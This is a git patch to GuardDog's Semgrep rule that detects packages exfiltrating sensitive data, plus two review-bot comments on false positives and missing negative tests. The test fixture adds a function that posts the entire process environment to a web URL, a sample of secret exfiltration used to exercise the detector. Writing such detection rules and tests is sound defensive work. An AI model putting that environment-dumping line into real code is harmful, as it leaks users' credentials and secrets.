From 6f283f19d1f849554e8cf5a692586655348c245a Mon Sep 17 00:00:00 2001
From: Ian Kretz <44385082+ikretz@users.noreply.github.com>
Date: Fri, 25 Oct 2024 07:07:07 -0500
Subject: [PATCH] Enhance Python data exfiltration rule (#475)

---
 guarddog/analyzer/sourcecode/exfiltrate-sensitive-data.yml | 2 +-
 tests/analyzer/sourcecode/exfiltrate-sensitive-data.py     | 7 +++++++
 2 files changed, 8 insertions(+), 1 deletion(-)

diff --git a/guarddog/analyzer/sourcecode/exfiltrate-sensitive-data.yml b/guarddog/analyzer/sourcecode/exfiltrate-sensitive-data.yml
index 605ee395..9400a53b 100644
--- a/guarddog/analyzer/sourcecode/exfiltrate-sensitive-data.yml
+++ b/guarddog/analyzer/sourcecode/exfiltrate-sensitive-data.yml
@@ -5,7 +5,7 @@ rules:
     metadata:
       description: Identify when a package reads and exfiltrates sensitive data from the local system
     pattern-sources:
-      - pattern: os.environ.items()
+      - pattern: os.environ
       - pattern: '[... for ... in os.environ.items()]'
       - pattern: socket.gethostname()
       - pattern: getpass.getuser()
diff --git a/tests/analyzer/sourcecode/exfiltrate-sensitive-data.py b/tests/analyzer/sourcecode/exfiltrate-sensitive-data.py
index 05ba1867..b386e803 100644
--- a/tests/analyzer/sourcecode/exfiltrate-sensitive-data.py
+++ b/tests/analyzer/sourcecode/exfiltrate-sensitive-data.py
@@ -172,6 +172,13 @@ def checkVersion():
     req.read()
 
 
+def leak_env_vars():
+    env_vars = os.environ
+    url = "https://www.datadoghq.com/"
+    # ruleid: exfiltrate-sensitive-data
+    requests.post(url, json=dict(env_vars))
+
+
 """
 RULEID: CTX
 """
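Review bot: Widening the source from `os.environ.items()` to the bare `os.environ` pattern makes every use of the mapping a taint source, including single-key reads such as `os.environ.get("HTTP_PROXY")` or `os.environ["HOME"]`, so a package that forwards one benign variable to a network call will now match, and nothing in this commit adds an `# ok:` case showing how much of that false-positive surface is accepted. The second source, `'[... for ... in os.environ.items()]'`, is now subsumed by `os.environ` and can be dropped so the list states only what actually differs. If single-variable reads are intentionally in scope (the `socket.gethostname()` and `getpass.getuser()` sources are single values too), `os.getenv(...)` is the one remaining read of the same data that the widened pattern does not cover; consider adding `- pattern: os.getenv(...)` next to it. The rule's mode and its sinks sit outside the hunk, so whether taint survives the `dict(...)` wrapper used by the new test is inferred from that test rather than visible here.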
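Review bot: The added `leak_env_vars` case only pins the whole-environment dump; it leaves the widened `os.environ` source without a negative test, so a regression that starts flagging ordinary configuration reads would go unnoticed. Two `# ok: exfiltrate-sensitive-data` cases would close that gap: one that reads a single key and keeps it local, e.g. `home = os.environ.get("HOME")` followed by `os.path.join(home, ".cache")`, and one where `dict(os.environ)` is built but never reaches a network sink, showing the sink requirement still holds. `leak_env_vars` is complete in the hunk; `os` and `requests` are presumably imported at the top of the test file, which is outside this view.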